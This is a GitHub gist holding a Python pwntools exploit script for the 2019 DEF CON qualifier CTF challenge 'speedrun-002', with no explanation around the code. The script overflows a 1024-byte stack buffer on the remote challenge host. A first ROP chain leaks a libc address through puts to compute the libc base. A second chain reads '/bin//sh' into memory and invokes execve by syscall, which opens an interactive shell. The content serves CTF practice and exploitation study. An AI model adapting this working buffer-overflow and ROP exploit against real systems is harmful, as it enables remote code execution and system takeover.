Skip to content

Instantly share code, notes, and snippets.

@ywkw1717 ywkw1717/speedrun-002.py
Last active May 13, 2019

Embed
What would you like to do?
#!/usr/bin/env python
from pwn import *
def main():
# conn = process("./speedrun-002")
# conn = remote("localhost", 3000)
conn = remote("speedrun-002.quals2019.oooverflow.io", 31337)
elf = ELF("./speedrun-002")
# libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
libc = ELF("./libc/lib/x86_64-linux-gnu/libc-2.27.so")
pop_rdi_ret = 0x4008a3 # pop rdi ; ret
# first payload
payload = "A" * 1024
payload += p64(0xdeadbeef) # rbp
payload += p64(pop_rdi_ret)
payload += p64(elf.got["write"])
payload += p64(elf.plt["puts"])
payload += p64(0x400600) # main
print conn.recvuntil("What say you now?\n")
conn.sendline("Everything intelligent is so boring.")
print conn.recvuntil("Tell me more.\n")
conn.sendline(payload)
print conn.recvuntil("Fascinating.\n")
leak_addr = u64(conn.recv(6) + "\x00\x00")
print "leak_addr: " + hex(leak_addr)
libc_base = leak_addr - libc.symbols["write"]
system_addr = libc_base + libc.symbols["system"]
print "libc_base: " + hex(libc_base)
print "system_addr: " + hex(system_addr)
bss_addr = 0x601062
pop_rdx_ret = 0x4006ec #: pop rdx ; ret
pop_rsi_pop_r15_ret = 0x4008a1 #: pop rsi ; pop r15 ; ret
syscall_ret = 0xd2975 #: syscall ; ret
mov_rax_rdi_ret = 0x586ed #: mov rax, rdi ; ret
read_addr = 0x4005e0
binsh = "/bin//sh\x00"
# second payload
payload = "A" * 1024
payload += p64(0xdeadbeef) # rbp
# read /bin//sh
payload += p64(pop_rdi_ret)
payload += p64(0)
payload += p64(pop_rsi_pop_r15_ret)
payload += p64(bss_addr)
payload += p64(0xdeadbeef) # padding
payload += p64(pop_rdx_ret)
payload += p64(9)
payload += p64(read_addr)
# execve
payload += p64(pop_rdi_ret)
payload += p64(59) # system
payload += p64(libc_base + mov_rax_rdi_ret)
payload += p64(pop_rdi_ret)
payload += p64(bss_addr)
payload += p64(pop_rsi_pop_r15_ret)
payload += p64(0)
payload += p64(0xdeadbeef) # padding
payload += p64(pop_rdx_ret)
payload += p64(0)
payload += p64(libc_base + syscall_ret)
payload += p64(0xdeadbeef)
print conn.recvuntil("What say you now?\n")
conn.sendline("Everything intelligent is so boring.")
print conn.recvuntil("Tell me more.\n")
conn.sendline(payload)
print conn.recvuntil("Fascinating.\n")
conn.sendline(binsh)
conn.interactive()
if __name__ == "__main__":
main()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.